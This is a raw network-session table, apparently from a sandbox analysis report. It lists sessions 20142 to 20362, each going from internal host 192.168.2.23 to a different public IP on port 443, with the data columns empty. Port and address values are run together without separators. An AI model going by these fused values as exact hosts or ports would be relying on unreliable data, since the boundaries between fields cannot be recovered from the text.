                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20142192.168.2.2337776187.131.231.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20143192.168.2.233510645.251.250.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20144192.168.2.2339062206.252.173.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20145192.168.2.234456085.190.21.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20146192.168.2.233922275.23.201.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20147192.168.2.234098064.158.16.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20148192.168.2.234000089.205.77.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20149192.168.2.234141467.67.82.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20150192.168.2.236013664.156.35.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20151192.168.2.235231450.228.149.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20152192.168.2.2359322184.30.207.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20153192.168.2.234156290.72.12.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20154192.168.2.234085467.79.39.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20155192.168.2.235512031.35.75.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20156192.168.2.2351570116.133.105.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20157192.168.2.235161627.6.75.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20158192.168.2.2342944115.194.238.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20159192.168.2.2359882179.238.147.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20160192.168.2.2344146167.240.253.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20161192.168.2.2352042122.51.114.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20162192.168.2.2344474176.1.65.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20163192.168.2.236020682.163.57.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20164192.168.2.23477029.201.203.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20165192.168.2.233680276.250.140.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20166192.168.2.2358148174.66.147.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20167192.168.2.2347100153.148.224.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20168192.168.2.233495020.138.159.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20169192.168.2.2350220135.23.49.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20170192.168.2.2355166199.80.5.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20171192.168.2.236070027.122.153.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20172192.168.2.235719674.45.72.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20173192.168.2.233632443.48.48.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20174192.168.2.2348240103.216.190.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20175192.168.2.2354218101.200.41.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20176192.168.2.235824054.66.11.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20177192.168.2.234319054.11.76.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20178192.168.2.233547450.20.232.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20179192.168.2.2346916133.229.240.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20180192.168.2.2342138177.80.97.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20181192.168.2.235027248.12.252.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20182192.168.2.234196485.199.73.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20183192.168.2.234958442.163.141.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20184192.168.2.2345404199.47.115.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20185192.168.2.235994673.232.145.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20186192.168.2.2338828184.24.21.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20187192.168.2.2351862136.238.122.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20188192.168.2.233591647.187.142.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20189192.168.2.2358286209.45.143.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20190192.168.2.2355738155.131.209.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20191192.168.2.2334030141.76.253.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192192.168.2.2339734169.94.155.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20193192.168.2.23395821.73.50.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20194192.168.2.2334358125.19.123.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20195192.168.2.235589479.165.216.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20196192.168.2.235331663.182.232.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20197192.168.2.2340436173.102.35.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20198192.168.2.235746838.26.31.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20199192.168.2.2348764129.85.77.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20200192.168.2.2345356109.188.226.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20201192.168.2.233515035.76.125.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20202192.168.2.2342560221.69.155.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20203192.168.2.2346590210.81.117.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20204192.168.2.2355362181.132.39.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20205192.168.2.234045824.24.211.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20206192.168.2.234266223.72.40.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20207192.168.2.2356322176.144.166.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20208192.168.2.2334656117.114.230.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20209192.168.2.2345668202.26.18.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20210192.168.2.234902257.75.201.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20211192.168.2.2340466219.112.180.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20212192.168.2.2338882223.3.175.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20213192.168.2.234282660.219.37.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20214192.168.2.2342076202.102.138.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20215192.168.2.2356162178.65.84.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20216192.168.2.2335450114.142.214.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20217192.168.2.2359376205.132.182.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20218192.168.2.23597424.207.15.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20219192.168.2.2357236204.142.165.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20220192.168.2.235420478.167.58.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20221192.168.2.235021237.129.232.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20222192.168.2.234401225.122.60.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20223192.168.2.2352322133.73.186.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20224192.168.2.2337264219.206.107.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20225192.168.2.2339934178.6.251.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20226192.168.2.235646225.185.115.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20227192.168.2.2349292114.118.222.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20228192.168.2.2350806180.77.72.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20229192.168.2.234557467.64.211.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20230192.168.2.234899834.140.15.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20231192.168.2.2354418197.97.196.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20232192.168.2.233981098.93.247.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20233192.168.2.234981099.185.139.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20234192.168.2.23549941.220.91.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20235192.168.2.2352338143.232.233.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20236192.168.2.23367925.223.70.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20237192.168.2.234661890.50.48.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20238192.168.2.23408128.119.55.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20239192.168.2.23533202.184.209.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20240192.168.2.2354016166.50.34.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20241192.168.2.234606037.11.184.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20242192.168.2.2339678223.89.82.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20243192.168.2.2333002170.145.225.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20244192.168.2.2352622115.175.183.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20245192.168.2.2341010157.255.138.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20246192.168.2.234035258.163.220.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20247192.168.2.23392282.14.159.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20248192.168.2.235578662.204.22.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20249192.168.2.2357628178.211.124.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20250192.168.2.2359630184.40.183.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20251192.168.2.2344120199.46.98.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20252192.168.2.2346630112.177.24.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20253192.168.2.2342408135.194.2.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20254192.168.2.234207024.31.251.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20255192.168.2.2353660180.112.229.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20256192.168.2.2356812118.61.176.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20257192.168.2.235583283.131.198.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20258192.168.2.2360576174.237.16.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20259192.168.2.2333314116.112.19.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20260192.168.2.2356768183.247.81.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20261192.168.2.2347894123.200.193.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20262192.168.2.2344534145.90.238.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20263192.168.2.2342910128.18.210.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20264192.168.2.2343624112.57.91.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20265192.168.2.233883674.249.224.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20266192.168.2.234146060.213.230.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20267192.168.2.2347172160.107.30.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20268192.168.2.2359572103.53.145.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20269192.168.2.2356996187.167.98.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20270192.168.2.2338100190.102.67.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20271192.168.2.234653640.169.195.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20272192.168.2.2338784141.22.154.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20273192.168.2.235294880.176.252.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20274192.168.2.235850662.148.90.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20275192.168.2.235696866.199.86.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20276192.168.2.2356656112.106.169.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20277192.168.2.234973859.157.29.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20278192.168.2.234409227.44.236.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20279192.168.2.2345498101.223.102.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20280192.168.2.234913479.99.42.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20281192.168.2.234065881.103.195.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20282192.168.2.2359922108.59.72.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20283192.168.2.2349208154.101.159.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20284192.168.2.235106413.184.172.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20285192.168.2.2357172194.89.220.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20286192.168.2.2333288205.218.32.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20287192.168.2.2333098126.172.65.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20288192.168.2.2354920184.244.33.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20289192.168.2.2340658202.142.67.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20290192.168.2.234050258.105.149.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20291192.168.2.233366293.50.34.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20292192.168.2.2351012177.216.5.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20293192.168.2.2356936111.117.92.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20294192.168.2.2344272160.156.188.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20295192.168.2.234602819.246.70.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20296192.168.2.235015891.208.22.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20297192.168.2.2333014175.26.115.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20298192.168.2.2349748168.188.213.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20299192.168.2.235934420.198.157.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20300192.168.2.2349616154.147.144.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20301192.168.2.2360582136.70.42.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20302192.168.2.235021620.187.202.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20303192.168.2.2350648190.51.71.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20304192.168.2.2350990217.21.175.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20305192.168.2.2355926213.60.237.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20306192.168.2.2341824126.57.203.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20307192.168.2.2356886216.183.53.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20308192.168.2.2349460173.176.75.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20309192.168.2.2358712197.222.136.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20310192.168.2.235753448.62.255.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20311192.168.2.2358492112.69.81.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20312192.168.2.2339064147.181.129.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20313192.168.2.233437276.173.13.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20314192.168.2.2353810197.70.68.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20315192.168.2.235511492.249.233.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20316192.168.2.2355378209.100.151.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20317192.168.2.2342274112.0.191.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20318192.168.2.234915812.235.210.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20319192.168.2.2350630188.44.3.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20320192.168.2.2357046159.239.66.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20321192.168.2.2341330208.88.119.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20322192.168.2.2346248194.23.73.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20323192.168.2.233553657.159.51.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20324192.168.2.2333828158.0.81.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20325192.168.2.2345614191.52.120.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20326192.168.2.2356872158.143.72.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20327192.168.2.233611824.224.178.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20328192.168.2.235933491.199.149.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20329192.168.2.2350988121.181.53.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20330192.168.2.2345872105.227.17.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20331192.168.2.2353998132.77.216.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20332192.168.2.2336184116.17.21.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20333192.168.2.2359086103.242.54.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20334192.168.2.233791418.35.227.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20335192.168.2.234273659.198.150.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20336192.168.2.2356398151.201.49.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20337192.168.2.2354042147.189.95.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20338192.168.2.234517639.25.105.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20339192.168.2.2356186201.37.216.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20340192.168.2.2336950166.59.24.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20341192.168.2.2344856198.28.245.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20342192.168.2.2350508118.61.183.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20343192.168.2.235720694.217.101.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20344192.168.2.234003414.225.206.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20345192.168.2.233691879.192.16.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20346192.168.2.2358632175.120.205.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20347192.168.2.2355640137.139.1.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20348192.168.2.234896448.98.225.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20349192.168.2.236074263.112.55.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20350192.168.2.235822685.61.122.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20351192.168.2.2342420174.242.32.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20352192.168.2.2336566174.3.190.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20353192.168.2.2339038191.120.201.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20354192.168.2.234276660.141.56.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20355192.168.2.234812840.148.69.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20356192.168.2.2340266124.219.213.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20357192.168.2.2351606190.17.53.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20358192.168.2.2353366133.247.224.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20359192.168.2.2343664220.2.56.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20360192.168.2.2349438148.238.7.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20361192.168.2.2349568191.248.212.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20362192.168.2.2346788176.210.131.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
